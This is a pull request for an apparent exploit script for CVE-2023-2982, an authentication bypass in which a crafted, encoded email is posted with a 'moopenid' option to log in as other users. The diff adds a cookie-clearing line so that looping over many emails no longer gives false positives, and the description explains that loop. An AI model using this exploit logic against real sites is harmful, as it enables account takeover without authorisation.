### PR TITLE
Update CVE-2023-2982.py

### DIFF
--- a/CVE-2023-2982.py
+++ b/CVE-2023-2982.py
@@ -37,6 +37,7 @@ def try_login(website_url,email):
     encoded_email = base64.b64encode(encrypted_email).decode('utf-8')
     # post moopenid
     try:
+       session.cookies.clear() # to clear the cookies when the function is being called again to prevent false positive
        response = session.post(website_url, headers={'Content-Type': 'application/x-www-form-urlencoded'},
                              data={'option': 'moopenid', 'email': encoded_email, 'appName': 'rlHeqZw2vrPzOiWWfCParA=='},
                              allow_redirects=False,verify=False,timeout=10)


### PR DESCRIPTION
# Clear Cookies in Python Requests Session

```python
session.cookies.clear()
```

this will prevent false positive if the function is being called again
```python
for email in emails:
    f.write(email + "\n")
    try_login(website_url,email)
```

as you can see in this for loop if the email logged in and printed as vaild the cookie is saved in the session variable so in the next email it will use the stored cookie from the previous one and it will print a false positive.

Hope you Found this helpful😊